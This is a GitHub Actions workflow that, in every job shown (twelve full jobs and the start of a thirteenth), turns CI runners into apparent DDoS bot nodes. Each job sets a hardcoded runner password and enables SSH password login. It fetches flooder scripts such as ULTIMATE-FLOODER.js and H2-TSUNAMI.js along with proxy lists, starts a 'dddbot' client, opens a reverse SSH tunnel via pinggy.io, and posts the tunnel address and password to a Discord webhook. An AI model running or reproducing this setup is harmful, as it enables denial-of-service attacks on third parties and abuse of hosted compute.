name: Ubuntu SSH Pinggy - 20 Paralel Job FULL

on:
  workflow_dispatch:

jobs:

  pinggy-1:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-2:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-3:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-4:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-5:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-6:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-7:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e
          set -x

          echo 'runner:Venom123!' | sudo chpasswd
          sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo systemctl restart ssh

          sudo apt update -y
          sudo apt install -y curl wget python3 python3-pip

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          # DOSYALAR
          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *
          ls -la

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-8:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-9:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-10:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-11:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-12:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
          sudo sysadminctl -resetPasswordFor runner -newPassword Venom123!
          sudo sed -i '' 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config
          sudo launchctl kickstart -k system/com.openssh.sshd || true

          brew install wget || true

          curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
          export NVM_DIR="$HOME/.nvm"
          [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

          nvm install 20.19.5
          nvm use 20.19.5

          npm install -g pm2
          npm init -y
          npm install gradient-string colors axios node-bash-title user-agents hpack socks randomstring sockopt

          wget -O proxy.txt https://raw.githubusercontent.com/akbarali123A/proxy_scraper/refs/heads/main/http_proxies.txt

          wget -O CACHE.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/CACHE.js
          wget -O DESTROY.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/DESTROY.js
          wget -O ua.txt https://raw.githubusercontent.com/netshort63-debug/awdad/main/ua.txt
          wget -O ULTIMATE-FLOODER.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/ULTIMATE-FLOODER.js
          wget -O rape.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/rape.js
          wget -O H2-TSUNAMI.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/H2-TSUNAMI.js
          wget -O home https://raw.githubusercontent.com/netshort63-debug/awdad/main/home
          wget -O MONARCH-FLOOD.js https://raw.githubusercontent.com/netshort63-debug/awdad/main/MONARCH-FLOOD.js

          chmod 777 *

          pm2 start client.py --interpreter python3 --name dddbot || true
          pm2 save
          pm2 list

          ssh -o StrictHostKeyChecking=no -p 443 -R0:localhost:22 tcp@a.pinggy.io > pinggy.log 2>&1 &
          sleep 15

          LINK=$(grep -oE 'tcp://[0-9a-zA-Z\.\-]+:[0-9]+' pinggy.log | head -n1)
          CLEAN=$(echo $LINK | sed 's/tcp:\/\///')

          curl -H "Content-Type: application/json" \
          -X POST \
          -d "{\"content\":\"SSH: $CLEAN\nUser: runner\nPass: Venom123!\"}" \
          "https://discord.com/api/webhooks/1461013177658769602/mjg15yU9egXIhpHMvomG2Brb5ASM8WJ8ca0CE-Foi_HHpTXox_LfTsYOLH-bv1xgzSKc"

          sleep 21000

  pinggy-13:
    runs-on: macos-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: FULL SETUP
        run: |
          set -e

          sudo systemsetup -setremotelogin on
